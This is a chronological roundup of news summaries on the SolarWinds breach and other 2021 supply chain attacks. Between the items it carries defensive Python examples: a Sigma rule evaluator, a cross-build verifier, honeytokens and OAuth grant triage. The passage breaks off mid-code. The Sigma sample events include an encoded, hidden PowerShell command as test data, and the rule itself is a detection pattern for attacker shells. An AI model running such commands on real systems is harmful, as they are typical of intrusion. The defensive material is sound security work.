Enterprise CIOs and CISOs in government and the private sector are still assessing the full impact of the advanced supply chain attacks uncovered in recent months. The fact of the matter here is that cyber is where the new wars are being fought and supply chain attacks are a winning playbook for the state-sponsored attackers.


_______________________________________________________________________________________

(April 14, 2021) 


Sunburst hack costs SolarWinds at least $18M

SolarWinds disclosed that it took a hit of at least $18 million from the massive Russian malware attack that compromised its flagship Orion technology management software. In releasing preliminary first-quarter results, SolarWinds said it spent $18 million to $19 million to investigate and remediate the cyber incident, related legal and other professional services, and consulting services provided to customers at no charge.

Ref - CFO

_______________________________________________________________________________________

(April 13, 2021)


A macOS malware is hidden into the NPM package supply chain

A new malicious package has been spotted on the npm registry, which targets NodeJS developers using Linux and Apple macOS operating systems. The malicious package is called "web-browserify," and imitates the popular Browserify npm component downloaded over 160 million times over its lifetime.


_______________________________________________________________________________________
 
(April 13, 2021) 


U.S. intelligence community details growing influence threats in wake of SolarWinds attacks

The intelligence community made its most direct public attribution yet that Russia was behind weaving malicious code into a SolarWinds software update to facilitate a sweeping espionage operation, impacting hundreds of companies and U.S. federal agencies. The readout does not specify whether Biden specifically discussed SolarWinds with his Russian counterpart.

Ref - CyberScoop 

_______________________________________________________________________________________

(April 13, 2021) 


Spy Chiefs to warn of threats from SolarWinds to North Korea

Biden’s intelligence team -- including Director of National Intelligence Avril Haines and CIA Director William Burns -- is under increasing pressure to respond to a widening series of national security threats while defending the administration’s continuing reviews and policy approaches even as it nears the 100-day mark in office.

Ref - Bloomberg

_______________________________________________________________________________________

(April 13, 2021) 


Detecting the next SolarWinds-Style cyberattack

Developing SIEM rules, using the SolarWinds attack as an example, can help in the detection of the next SolarWinds-like attack. Sigma rules can serve as a common language to create and share quality queries regardless of the SIEM an organization uses. This enables Security Operations teams to build out the elements needed to detect future attacks. The same Sigma rule can be used across multiple SIEMs, including Splunk, QRadar, and Azure Sentinel.
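To make the "common language" concrete, here is an added example, not code from the page or from any SIEM vendor: a Sigma-style rule expressed in Sigma's own structure (logsource, named selection maps, field modifiers, a boolean condition), applied by a small evaluator to constructed Sysmon-style process-creation events. The rule follows the widely shared detection idea that the Orion host process, SolarWinds.BusinessLayerHost.exe, has no business spawning a command interpreter, which is how SUNBURST's follow-on activity surfaced. In production the same rule, written as YAML, is converted to each SIEM's query language with sigma-cli rather than evaluated in Python; the `filter` exclusion and the events are hypothetical.

```python
"""Apply a Sigma-style detection rule to sample process-creation events.

Added example, not from the page or any SIEM vendor. The evaluator supports
the Sigma constructs used here: selection maps (AND across keys, OR across
list values), the |endswith, |startswith and |contains modifiers, and
conditions built from and/or/not and parentheses. Events are constructed.
"""

RULE = {
    "title": "Shell spawned by SolarWinds Orion host process",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "ParentImage|endswith": "\\SolarWinds.BusinessLayerHost.exe",
            "Image|endswith": ["\\cmd.exe", "\\powershell.exe", "\\pwsh.exe", "\\rundll32.exe"],
        },
        # Hypothetical site-specific exclusion for an approved maintenance script.
        "filter": {"CommandLine|contains": "\\ProgramData\\AcmeBackup\\"},
        "condition": "selection and not filter",
    },
    "level": "high",
}

EVENTS = [  # constructed Sysmon Event ID 1 (process creation) records
    {"ParentImage": r"C:\Program Files (x86)\SolarWinds\Orion\SolarWinds.BusinessLayerHost.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami", "User": "NT AUTHORITY\\SYSTEM"},
    {"ParentImage": r"C:\Program Files (x86)\SolarWinds\Orion\SolarWinds.BusinessLayerHost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA", "User": "NT AUTHORITY\\SYSTEM"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe", "User": "CORP\\alice"},
    {"ParentImage": r"C:\Program Files (x86)\SolarWinds\Orion\SolarWinds.BusinessLayerHost.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\ProgramData\AcmeBackup\snapshot.bat"', "User": "NT AUTHORITY\\SYSTEM"},
]


def _value_matches(value, pattern, modifier):
    if value is None:
        return False
    v, p = str(value).lower(), str(pattern).lower()  # Sigma string matching is case-insensitive
    if modifier == "endswith":
        return v.endswith(p)
    if modifier == "startswith":
        return v.startswith(p)
    if modifier == "contains":
        return p in v
    if modifier == "":
        return v == p
    raise ValueError(f"unsupported modifier {modifier!r}")


def _selection_matches(event, criteria):
    """Every key in a selection map must match; a list value matches if any item does."""
    for key, patterns in criteria.items():
        field, _, modifier = key.partition("|")
        candidates = patterns if isinstance(patterns, list) else [patterns]
        if not any(_value_matches(event.get(field), p, modifier) for p in candidates):
            return False
    return True


def _eval_condition(condition, names):
    """Recursive-descent evaluator for conditions over selection names
    (no '1 of' / 'all of' aggregations)."""
    tokens = condition.replace("(", " ( ").replace(")", " ) ").split()
    pos = 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def take():
        nonlocal pos
        tok = tokens[pos]
        pos += 1
        return tok

    def parse_or():
        result = parse_and()
        while peek() == "or":
            take()
            result = parse_and() or result
        return result

    def parse_and():
        result = parse_not()
        while peek() == "and":
            take()
            result = parse_not() and result
        return result

    def parse_not():
        tok = take()
        if tok == "not":
            return not parse_not()
        if tok == "(":
            inner = parse_or()
            if take() != ")":
                raise ValueError("unbalanced parentheses in condition")
            return inner
        if tok not in names:
            raise ValueError(f"unknown selection {tok!r} in condition")
        return names[tok]

    result = parse_or()
    if peek() is not None:
        raise ValueError(f"unexpected token {peek()!r} in condition")
    return result


def evaluate(rule, event):
    detection = rule["detection"]
    names = {name: _selection_matches(event, crit)
             for name, crit in detection.items() if name != "condition"}
    return _eval_condition(detection["condition"], names)


def alerts(rule, events):
    """Return (rule title, command line) for every event the rule fires on."""
    return [(rule["title"], e["CommandLine"]) for e in events if evaluate(rule, e)]


if __name__ == "__main__":
    for title, cmdline in alerts(RULE, EVENTS):
        print(f"[{title}] {cmdline}")
```

The point of the exercise is that the rule, not the evaluator, is the portable artifact: the same selection and condition compile to a Splunk SPL search, a QRadar AQL query or a Sentinel KQL query, so detection logic can be reviewed and shared once and deployed everywhere.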

_______________________________________________________________________________________

(April 12, 2021)


SolarWinds hack underscores the need for moving to the cloud

According to Microsoft CEO Satya Nadella, the SolarWinds attack underscores the importance of implementing zero trust architecture and migrating to the cloud. Nadella sees the SolarWinds hack as a wake-up call for all companies to take security as a first-class priority.

Ref - CRN

_______________________________________________________________________________________

(April 12, 2021)


Biden names former top NSA officials to two key cyber roles

President Biden has appointed former National Security Agency (NSA) deputy director Chris Inglis and former deputy for counterterrorism at the NSA Jen Easterly to two top cyber roles in the administration. The appointments come as the White House is still dealing with the fallout over the SolarWinds cyber attack, which infiltrated multiple federal agencies.

Ref - Axios
 
_______________________________________________________________________________________

(April 10, 2021)


APKPure users targeted via a supply chain attack

APKPure, one of the largest alternative app stores, was the victim of a supply chain attack in which threat actors compromised client version 3.17.18 to deliver malware. The app store is available only on devices that use Google Mobile Services (GMS) and are firmly tied to Google’s infrastructure. The tainted client downloads and installs various apps, including other malicious payloads.


_______________________________________________________________________________________

(April 9, 2021)


Stopping or preventing the next SolarWinds breach 

Mitigating the next SolarWinds breach will require more cyber-savvy people to assess and recognize those threats, explain their potential impact and advocate for enterprise-wide investment in the appropriate levels of protection. Additionally, it will require more boots on the ground in a field that has evolved to encompass a growing array of sub-areas and rapidly changing technologies.


_______________________________________________________________________________________

(April 9, 2021)


Gigaset devices laced with malware in the latest supply chain attack

Cybercriminals managed to sneak several malicious apps onto Gigaset Android devices by compromising a server belonging to an external update service provider. The models affected, according to Malwarebytes, include the Gigaset GS270 and GS160, Siemens GS270 and GS160, all running Android 8, as well as the Alps P40pro, running Android 9, and S20 pro+, running Android 10.

Ref - IT Pro

_______________________________________________________________________________________

(April 9, 2021)


Supply chain disruptions lead to the loss of trillions of dollars

Supply chain disruptions in 2020 had a real impact on the bottom line, as companies lost trillions of dollars in revenue, according to a recent survey report, with 64% of respondents reporting revenue losses between 6% and 20%. The survey also indicated that the disruptions caused a big hit to brand reputation, with 38% of respondents reporting that their brands had been impacted. Many respondents said that their struggles to maintain supplies of goods and services left customers frustrated.


_______________________________________________________________________________________

(April 9, 2021)


What the Titans of Industry Reveal about SolarWinds Attack

During the testimony, it was outlined how the SolarWinds software was hijacked and used to break into a host of other organizations, and that the hackers had been able to read Microsoft’s source code for user authentication. Unfortunately for Microsoft, and as strongly pointed out by CrowdStrike, the hackers took advantage of well-known weaknesses in Windows authentication and Active Directory Federation Services.


_______________________________________________________________________________________

(April 9, 2021)


How to protect against software supply-chain attacks

Organizations can protect themselves against supply-chain attacks with some simple tips. They should avoid the use of third-party modules, watch for threats when using modules by unknown authors, and perform automated scans of code submitted to repositories. They can also have a plan for external services and develop an on-premises and cloud strategy.

Ref - SCMagazine 

_______________________________________________________________________________________

(April 8, 2021)


CISA releases tool to review Microsoft 365 post-compromise activity

CISA has released a new tool, dubbed Aviary, that can help security teams visualize and analyze data outputs generated using Sparrow, an open-source PowerShell-based tool for detecting potentially compromised applications and accounts in Azure and Microsoft 365. Sparrow was created to help defenders hunt down threat activity after the SolarWinds supply-chain attack.


_______________________________________________________________________________________

(April 8, 2021)


How to minimize cyberattacks on supply and value chains

Organizations can mitigate access-related third-party risk in several ways. This includes providing an identity to anything connecting to the enterprise, including people, systems, and things. Another way is taking advantage of identity broker technology to verify credentials and enrich authentication requirements. Applying access governance to third-party identities and centrally managing all third-party access can also help minimize the risks.


_______________________________________________________________________________________

(April 8, 2021)


Biden administration sets the stage for retaliation against Russia over SolarWinds attack

The Biden administration completed an intelligence review of alleged Russian meddling in the SolarWinds cybersecurity attack and interference in US elections. The review could set the stage for possible retaliatory actions like enacting sanctions or expulsion of Russian intel officers in the US.

Ref - Yahoo 

_______________________________________________________________________________________

(April 7, 2021)


In another supply chain incident, Gigaset injects malware into victims' phones

Android smartphones from Gigaset have been infected by malware directly from the manufacturer in what appears to be a supply-chain attack. The Trojan, once downloaded and installed on a victim's device via a poisoned software update from the vendor, is capable of opening browser windows, fetching more malicious apps, and sending people text messages to further spread the malware.

Ref - The Register 

_______________________________________________________________________________________

(April 7, 2021)


Supply-chain attacks - When trust goes wrong

Minimizing the risk of a supply-chain attack involves a never-ending loop of risk and compliance management. In the SolarWinds hack, the post-attack in-depth inspection of the third-party vendor’s product identified the exploit buried deep in the code. As a preventive measure, organizations need to have visibility into all of their suppliers and the components they deliver, which includes the policies and procedures that the company has in place.


_______________________________________________________________________________________

(April 6, 2021)


Senators press for more on SolarWinds hack after AP report

Key lawmakers said they're concerned they've been kept in the dark about what suspected Russian hackers stole from the federal government and they pressed Biden administration officials for more details about the scope of what's known as the SolarWinds hack.


_______________________________________________________________________________________

(April 6, 2021)


RSA Conference 2021 will have a keynote from SolarWinds’s president

RSA Conference announced that Sudhakar Ramakrishna, President of SolarWinds, has joined the keynote line-up for RSA Conference 2021. He will be joined by Laura Koetzle to explore the technical elements of the breach and will provide a deep understanding of the sophistication of the overall operation of the nation-state attack.


_______________________________________________________________________________________

(April 5, 2021)


SolarWinds type attacks need a serious approach toward cybersecurity 

The federal government has to take cybersecurity more seriously, both from a funding and a legislation standpoint after the SolarWinds breach. There is some hope that this will happen with the new administration, but it remains to be seen if talk will turn into action and real change. Only with a concerted effort across all levels of government, big to small, national/state to local, will we be able to overcome this cyber assault and keep our citizens safe and secure.

Ref - GovTech

_______________________________________________________________________________________

(April 5, 2021)


The cybersecurity warning system in the U.S.

Many vulnerabilities and threats aren’t discovered by the government but are regularly uncovered by hackers who find bugs, notify companies, and often work with them to develop fixes. In turn, CISA can immediately issue directives, as it did during SolarWinds and the Microsoft Exchange compromise, that mandate action for federal agencies and sound the clarion call for others to heed.


_______________________________________________________________________________________

(April 2, 2021)


The importance of supply chain risk management

With cloud and digital technology allowing companies to flourish and succeed globally, the world has never been more interconnected. However, this comes with elevated risk. Partners, vendors, and third parties can expose companies and malicious hackers are known to target organizations through their supply chain. As a result, supply chain risk management has become a critical component of any company’s risk management and cybersecurity strategy.

Ref - Varonis

_______________________________________________________________________________________

(April 2, 2021)


The positive outcome from the SolarWinds breach

The SolarWinds compromise may have some positive outcomes by shining an even harsher light on the complacency that still exists when it comes to security. It is important especially for the different security standards that are applied to development/supplier systems compared to in-house production systems. Now, securing the supply chain has become a hot topic, and organizations can do better to protect their infrastructure.

Ref - BMC

_______________________________________________________________________________________

(April 2, 2021)


How Russian hackers targeted US cyber first responders in SolarWinds breach

After infiltrating US government computer networks early last year as part of the SolarWinds data breach, Russian hackers then turned their attention to the very people whose job was to track them down. The hackers identified a handful of key cybersecurity officials and analysts who would be among the first to respond once the hack was detected, so-called 'threat hunters,' and attempted to access their email accounts.

Ref - CNN 

_______________________________________________________________________________________

(April 1, 2021)


After the hack, officials draw attention to supply chain threats

The National Counterintelligence and Security Center warned that foreign hackers are increasingly targeting vendors and suppliers that work with the government to compromise their products in an effort to steal intellectual property and carry out espionage. The NCSC said it is working with other agencies, including CISA, to raise awareness of the supply chain issue.

Ref - AP News

_______________________________________________________________________________________

(April 1, 2021)


Learnings from the SolarWinds supply chain attack

The recent SolarWinds attack (known as Sunburst) has shone a light on the controls required after a breach, with affected organizations laser-focused on what happened and what next. But the same controls that can help remediate the risks posed by this serious supply chain threat can also help prevent or limit the effect of this and other attacks before they happen.

Ref - Accenture

_______________________________________________________________________________________

(April 1, 2021)


The U.S. officials are drawing attention to the supply chain attacks

The U.S. government is working to draw attention to supply chain vulnerabilities, an issue that received particular attention late last year after suspected Russian hackers gained access to federal agencies and private corporations by sneaking malicious code into widely used software. The NCSC said it plans to issue guidance throughout the month about how specific sectors, like health care and energy, can protect themselves.


_______________________________________________________________________________________

(April 1, 2021)


The SolarWinds hack severity perception increased over time

(ISC)² has published the results of an online survey of 303 cybersecurity professionals on the SolarWinds Orion software breach. Of those, 86% of respondents rated the breach “very” or “extremely severe” when they first learned about it. Roughly six weeks after the incident was reported, as more details emerged, the number of respondents who indicated that the breach was “severe” increased from 51% to 55%.


_______________________________________________________________________________________

(April 1, 2021)


A report with detailed analysis of SolarWinds hacking tools

US Cyber Command and the Department of Homeland Security (DHS) are preparing to release a detailed analysis of the hacking tools used in the SolarWinds attack, which targeted multiple federal agencies and private firms last year. The report was originally scheduled to be released on Wednesday, but the DHS delayed it without explanation. However, it's still expected to be published soon.

Ref - Computing

_______________________________________________________________________________________

(April 1, 2021)


DHS chief announces cybersecurity plan in wake of SolarWinds attacks

Homeland Security Secretary Alejandro Mayorkas warned that cyber threats are coming dangerously close to threatening people’s lives as he announced a series of sprints designed to counter online attacks. The series includes 60-day sprints, each focused on the most important and most urgent priorities needed to achieve goals.

Ref - Yahoo

_______________________________________________________________________________________

(March 31, 2021)


The SolarWinds breach is a wake-up call for the security community

The next time a SolarWinds-class attack occurs, the steps toward a successful response are already defined. Understanding potential concentration risks may involve delving into third-party liabilities and obligations, categorizing vendors, and understanding the scope of the larger supplier ecosystem. By defining potential sources of this risk, it becomes possible to build mitigation strategies into incident response plans.

Ref - Deloitte

_______________________________________________________________________________________

(March 30, 2021)


Executive order with 'a dozen' actions forthcoming after SolarWinds, Microsoft breaches

The Biden administration is working on “close to a dozen” action items to be included in an upcoming executive order meant to strengthen federal cybersecurity in the wake of two major breaches. The comments were made as the Biden administration continues to grapple with the fallout from both the recent attacks.

Ref - TheHill 

_______________________________________________________________________________________

(March 30, 2021)


Infosec community is concerned about SolarWinds hack

The severity of a data breach typically jumps in the short term and decreases as time progresses. But, according to a survey by the International Information System Security Certification Consortium, or (ISC)², the 2020 SolarWinds incident bucked that trend in the eyes of cybersecurity professionals. A month and a half after the incident was reported, the number of respondents who indicated the breach was “severe” increased from 51% to 55%.


_______________________________________________________________________________________

(March 30, 2021)


Details about the second elusive attack targeting SolarWinds software

Details about the scope and victims of Supernova, which exploited a flaw in SolarWinds' Orion network management software, so far have been scarce. Less than a handful of victims have been known to be targeted, and an investigation into the breach of one of those victims led to researchers at Secureworks tying the Supernova attacks to a previously unknown Chinese nation-state group they dubbed "Spiral."


_______________________________________________________________________________________

(March 30, 2021)


SolarWinds breach led to distrust of software in use

Security experts say that because enterprises can't inspect the inner workings of the software they buy, they're at the mercy of software companies' security practices. In the SolarWinds attack, attackers infected software that organizations trusted, and that software became a way to steal confidential information. This breach of trust in software is significant because software drives nearly everything in the technology industry.


_______________________________________________________________________________________

(March 30, 2021)


Trump administration emails were compromised in SolarWinds breach

An Associated Press report found that the head of DHS and the department's cyber-security staff were among the accounts exposed during the SolarWinds hack. Email accounts belonging to members of the Trump administration's Department of Homeland Security, including the head of the department, were reportedly compromised by suspected Russian hackers, according to the report.

Ref - Yahoo

_______________________________________________________________________________________

(March 29, 2021)


Key lessons from Sunburst

The cyber domain is a realm of intense interconnectivity that underpins much of daily life and national security. The discovery late in 2020 that Sunburst malware had infected not only thousands of private networks but also US government agencies, led some spectators to embrace alarmist views of this event as the first step in a full-fledged cyberwar.


_______________________________________________________________________________________

(March 29, 2021)


PHP's Git server hacked in a recent supply chain attack

In the latest software supply chain attack, the official PHP Git repository was hacked and the code base tampered with. Two malicious commits were pushed to the php-src Git repository maintained by the PHP team on their git.php.net server. The threat actors had signed off on these commits as if these were made by known PHP developers and maintainers, Rasmus Lerdorf and Nikita Popov.


_______________________________________________________________________________________

(March 29, 2021)


SolarWinds breach got emails of top DHS officials

Suspected Russian hackers gained access to email accounts belonging to the Trump administration’s head of the Department of Homeland Security and members of the department’s cybersecurity staff whose jobs included hunting threats from foreign countries. The intelligence value of the hacking of then-acting Secretary Chad Wolf and his staff is not publicly known.

Ref - AP News

_______________________________________________________________________________________

(March 29, 2021)


Need for a new alert system for cybersecurity

America needs a national cyber vulnerability early warning center after the recent SolarWinds breach. Just as a meteorologist is constantly on the lookout for storm systems, an early warning center would search widely used software and hardware components for vulnerabilities. It would discover new weaknesses before opponents, fortifying defenses and increasing the costs of mounting an attack.


_______________________________________________________________________________________

(March 29, 2021)


SolarWinds patches four new vulnerabilities in the Orion platform

SolarWinds released fixes for four new vulnerabilities in their Orion platform, the most severe of which is an authenticated remote code execution flaw due to a JSON deserialization weakness. Fixes for these weaknesses are in Orion Platform 2020.2.5.

Ref - Rapid7 

_______________________________________________________________________________________

(March 26, 2021)


SolarWinds hackers copied a limited number of source code repositories - Mimecast

A forensic investigation conducted by Mimecast and FireEye Mandiant incident response division found that SolarWinds hackers downloaded a limited number of the company’s source code repositories.

Ref - CPO Magazine 

_______________________________________________________________________________________

(March 26, 2021)


Software security is the top priority - SolarWinds CEO

SolarWinds has launched a Secure by Design initiative in response to the recent cybersecurity attack. This project is designed to build security into the design phase of software development and to make security an ongoing priority instead of an after-the-fact priority. The company is testing a design process that uses several parallel build chains simultaneously to create software instead of just one. 

Ref - TechRepublic 

_______________________________________________________________________________________

(March 26, 2021)


Lessons learned from the SolarWinds breach

A system like SolarWinds should have security checks built in from the start and the use of software signing keys should always be closely monitored. In addition, organizations need to adopt a zero-trust policy, stay vigilant, and create a security culture to prevent complex attacks like this.

Ref - Forbes

_______________________________________________________________________________________

(March 25, 2021)


Strategies to guard against email fraud in supply chain

Proofpoint has provided six recommendations to protect supply chain relationships: knowing who the suppliers are, considering the "spider web," creating more vendor accountability, being responsive to security-conscious users, relying more on automation, and finally implementing DMARC at the gateway.


_______________________________________________________________________________________

(March 25, 2021)


SolarWinds breach - Key learnings

Security experts identified several critical learnings from the SolarWinds breach: threat hunting and threat intelligence built on artificial intelligence and machine learning; comprehensive detection with real-time continuous monitoring; a simplified incident response infrastructure that is capable of detecting attacks, containing the damage, and restoring systems and data; agile, integrated, and automated security technology; and dynamic remediation strategies designed to quickly return business operations to a trusted state.

Ref - OpenText

_______________________________________________________________________________________

(March 25, 2021)


Fed breach disclosure rule after SolarWinds breach

An executive order in the wake of the SolarWinds hack will require software vendors and service providers to notify their U.S. government clients if they experience a security breach. Major software companies like Microsoft and Salesforce that sell to the government would be affected by the executive order.

Ref - CRN

_______________________________________________________________________________________

(March 25, 2021)


Fresh code execution flaws in the SolarWinds Orion platform

SolarWinds has shipped a major security update to fix at least four documented security vulnerabilities, including a pair of bugs that can be exploited for remote code execution attacks. The patches were pushed out as part of a security makeover of the Orion Platform, the same SolarWinds product that was compromised in the recent nation-state software supply chain attack.


_______________________________________________________________________________________

(March 25, 2021)


SolarWinds making changes in the build process after the hack

SolarWinds’ chief executive said the software provider made a series of changes to its build process and board room reporting structure in an effort to prevent another supply chain attack like the one experienced by the company. The company is also taking a series of actions designed to boost the profile of cybersecurity in business decisions and increase the autonomy of its chief information security officer and CIO shops.

Ref - SC Media
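The two SolarWinds items above (the Secure by Design initiative with several parallel build chains, and the changes to the build process described by the CEO) rest on one idea: if independent build pipelines must agree byte-for-byte before a release ships, an implant in any single build environment shows up as a digest mismatch. The following Python is an added example of that check, not SolarWinds' own tooling; the chain names, artifact names and artifact bytes are constructed stand-ins for real pipelines and binaries.

```python
"""
Cross-chain build verification (added example, not SolarWinds' own code).

Each artifact is produced by several independent build chains. A release is
accepted only when every chain yields byte-identical output; a chain that
disagrees with the majority is reported as an outlier for investigation.
"""
import hashlib
from collections import Counter


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def compare_builds(chains: dict) -> dict:
    """
    chains maps chain name -> {artifact name -> artifact bytes}.
    Returns {artifact name -> report}, where report["status"] is one of:
      "consistent" : all chains agree; report["digest"] is the shared SHA-256
      "divergent"  : chains disagree; report["outliers"] lists the chains whose
                     digest differs from the majority, report["digests"] has all
      "missing"    : some chain did not produce the artifact at all
    """
    artifacts = set()
    for outputs in chains.values():
        artifacts.update(outputs)

    report = {}
    for name in sorted(artifacts):
        digests = {chain: sha256_hex(outputs[name])
                   for chain, outputs in chains.items() if name in outputs}
        if len(digests) != len(chains):
            report[name] = {"status": "missing",
                            "missing_from": sorted(set(chains) - set(digests))}
            continue
        distinct = set(digests.values())
        if len(distinct) == 1:
            report[name] = {"status": "consistent", "digest": distinct.pop()}
            continue
        # Majority vote; with an exact tie the first-seen digest wins, so with
        # only two chains both are simply "one chain disagrees with the other".
        majority_digest, _ = Counter(digests.values()).most_common(1)[0]
        outliers = sorted(c for c, d in digests.items() if d != majority_digest)
        report[name] = {"status": "divergent", "outliers": outliers,
                        "digests": digests}
    return report


def release_allowed(report: dict) -> bool:
    """Ship only if every artifact is consistent across all chains."""
    return all(r["status"] == "consistent" for r in report.values())


# Constructed sample: three chains; "build-c" emits a tampered core library.
CLEAN_CORE = b"MZ...constructed clean core library..."
TAMPERED_CORE = CLEAN_CORE + b"...extra bytes appended by a compromised chain"
SAMPLE_CHAINS = {
    "build-a": {"app-core.dll": CLEAN_CORE, "installer.msi": b"constructed msi"},
    "build-b": {"app-core.dll": CLEAN_CORE, "installer.msi": b"constructed msi"},
    "build-c": {"app-core.dll": TAMPERED_CORE, "installer.msi": b"constructed msi"},
}

if __name__ == "__main__":
    rep = compare_builds(SAMPLE_CHAINS)
    for name, r in rep.items():
        print(f"{name}: {r['status']} {r.get('outliers', '')}")
    print("release allowed:", release_allowed(rep))
```

The majority vote only identifies which chain to look at; it is not proof that the majority is clean, so a divergence should block the release and trigger a comparison of the chain environments rather than a re-run until the digests happen to agree.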

_______________________________________________________________________________________

(March 25, 2021)


Some powerful tactics to prevent supply chain attacks

UpGuard recommends some defense tactics that organizations can implement to significantly decrease the chances of a supply chain attack. These include implementing honeytokens, securing privileged access management, implementing a Zero-Trust architecture, and assuming a breach mindset when preparing the security strategy.

Ref - UpGuard
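Of the tactics listed above, honeytokens are the one that turns directly into code. The Python below is an added example, not UpGuard's or any vendor's tooling: it mints decoy API keys that have no legitimate use, records where each one was planted, and replays constructed authentication-gateway log lines to raise an alert whenever a decoy is presented. The log format, the placements and the IP addresses (from the RFC 5737 documentation ranges) are all constructed for the example.

```python
"""
Honeytoken planting and detection (added example, not UpGuard's code).

A honeytoken is a credential nobody should ever use. Any attempt to use it is
an alert by definition, and because the registry remembers where each token
was planted, the alert also says which file share, repo or vendor system the
intruder read.
"""
import re
import secrets

# Constructed log line shape used by this example's imaginary auth gateway.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) auth key=(?P<key>\S+) src=(?P<src>\S+) result=(?P<result>\S+)$"
)


class HoneytokenRegistry:
    """Mints decoy API keys and remembers where each one was planted."""

    def __init__(self):
        self._placements = {}          # token value -> placement description

    def mint(self, placement: str) -> str:
        # Same shape as a real key so it cannot be told apart by inspection.
        token = "ak_" + secrets.token_hex(16)
        self._placements[token] = placement
        return token

    def scan(self, log_lines):
        """Return one alert per log line that presents a planted token.

        The key is parsed out of the line rather than substring-matched, so a
        real key that merely shares a prefix with a decoy is never flagged.
        """
        alerts = []
        for line in log_lines:
            m = LOG_RE.match(line)
            if not m:
                continue                          # unrelated or malformed line
            placement = self._placements.get(m["key"])
            if placement is None:
                continue                          # a real key, not a decoy
            alerts.append({
                "timestamp": m["ts"],
                "source_ip": m["src"],
                "planted_at": placement,          # what the intruder read
                "result": m["result"],
            })
        return alerts


def demo():
    """Plant two decoys, then replay constructed gateway log lines."""
    reg = HoneytokenRegistry()
    reg.mint("config/prod.env in the internal git repo")
    decoy_share = reg.mint("vendor-portal/credentials.txt on the partner file share")
    real_key = "ak_" + secrets.token_hex(16)      # a legitimate key, not a decoy
    lines = [
        f"2021-03-25T09:58:02Z auth key={real_key} src=198.51.100.4 result=OK",
        f"2021-03-25T10:02:11Z auth key={decoy_share} src=203.0.113.7 result=DENIED",
        "2021-03-25T10:02:12Z healthcheck ok",
        f"2021-03-25T10:03:40Z auth key={decoy_share} src=203.0.113.7 result=DENIED",
    ]
    return reg.scan(lines)


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

The gateway should reject the decoy (the result is DENIED either way), so the value of the token lies entirely in the alert: two uses from the same source of a key that only ever existed on the partner file share tells the responder where to start.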

_______________________________________________________________________________________

(March 25, 2021)


‘Trust no one’ becomes cyber mantra after massive hacking attacks

In the wake of two massive cyberattacks that exposed glaring deficiencies in U.S. defenses, government officials and cybersecurity practitioners are saying zero-trust may be the way to stop the cyber mayhem. Zero-trust reduces or prevents lateral movement and privilege escalation.

Ref - JapanTimes 

_______________________________________________________________________________________

(March 24, 2021)


Securing the software development build using secure design

SolarWinds SVP, Engineering Lee McClendon, KPMG Director of Cyber Security Services Caleb Queern, and Head Geek Thomas LaRock provide insights on how SolarWinds is prioritizing security in its software build environment, and what the entire industry can learn about next-generation software development.

Ref - SolarWinds 

_______________________________________________________________________________________

(March 24, 2021)


SolarWinds attack and other threats indicate increased nation-state activity

Cyber attacks launched by nation-states are becoming more proficient and aggressive. This was the message from Admiral (ret.) Michael S. Rogers at the NetDiligence Cyber War Webinar Series. He said that the breadth of activity has now changed with the SolarWinds attack in December 2020 and the attack on Microsoft Exchange this month, both arguably evidence of increased nation-state activity.

Ref - Yahoo

_______________________________________________________________________________________

(March 23, 2021)


Attackers can abuse OAuth authentication apps used in the SolarWinds breach

Given the broad permissions they can have to your core cloud applications, OAuth apps have become a growing attack surface and vector. Attackers use various methods to abuse OAuth apps, including compromising app certificates, which was also used in the SolarWinds / Solorigate campaign. Attackers can use OAuth access to compromise and take over cloud accounts. Until the OAuth token is explicitly revoked, the attacker has persistent access to the user’s account and data. 
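The point that matters operationally in the item above is the last sentence: a granted OAuth app keeps its access until someone revokes it, so consent grants need periodic review. The Python below is an added example of such a triage pass, not code from the original post or from any cloud provider; the grant records use a constructed, simplified shape (the real audit-log schema of a tenant will differ, so every field name here is an assumption), and the app names and ids are placeholders.

```python
"""
Triage of OAuth consent grants (added example, not from the original post).

Each grant is scored by the blast radius of its scopes, whether it carries
offline_access (a refresh token, so access persists until revoked), whether
the publisher is verified, and whether an admin granted it tenant-wide.
"""
from dataclasses import dataclass, field

# Scopes that give an app broad, durable access to mail, files or the directory.
HIGH_RISK_SCOPES = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send",
    "Files.Read.All", "Files.ReadWrite.All",
    "Directory.ReadWrite.All", "Application.ReadWrite.All",
}
# offline_access yields a refresh token: access outlives the user's session.
PERSISTENCE_SCOPE = "offline_access"


@dataclass
class ConsentGrant:                 # constructed, simplified record shape
    app_name: str
    app_id: str
    scopes: list
    consent_by: str                 # "admin" (tenant-wide) or "user"
    publisher_verified: bool
    grant_id: str


@dataclass
class Finding:
    grant_id: str
    app_name: str
    severity: str                   # "high", "medium" or "low"
    reasons: list = field(default_factory=list)


def score_grant(g: ConsentGrant) -> Finding:
    reasons = []
    risky = sorted(set(g.scopes) & HIGH_RISK_SCOPES)
    persistent = PERSISTENCE_SCOPE in g.scopes
    if risky:
        reasons.append(f"high-risk scopes: {', '.join(risky)}")
    if persistent:
        reasons.append("offline_access: refresh token persists until revoked")
    if not g.publisher_verified:
        reasons.append("publisher not verified")
    if g.consent_by == "admin" and risky:
        reasons.append("tenant-wide admin consent on high-risk scopes")

    if risky and (g.consent_by == "admin" or not g.publisher_verified):
        severity = "high"
    elif risky or (persistent and not g.publisher_verified):
        severity = "medium"
    else:
        severity = "low"
    return Finding(g.grant_id, g.app_name, severity, reasons)


def triage(grants) -> list:
    """Findings sorted high -> low so the review queue starts with the worst."""
    order = {"high": 0, "medium": 1, "low": 2}
    return sorted((score_grant(g) for g in grants), key=lambda f: order[f.severity])


# Constructed sample grants (names and ids are placeholders).
SAMPLE_GRANTS = [
    ConsentGrant("Mail Sync Helper", "00000000-0000-0000-0000-000000000001",
                 ["Mail.ReadWrite", "offline_access", "User.Read"],
                 consent_by="admin", publisher_verified=False, grant_id="g-1"),
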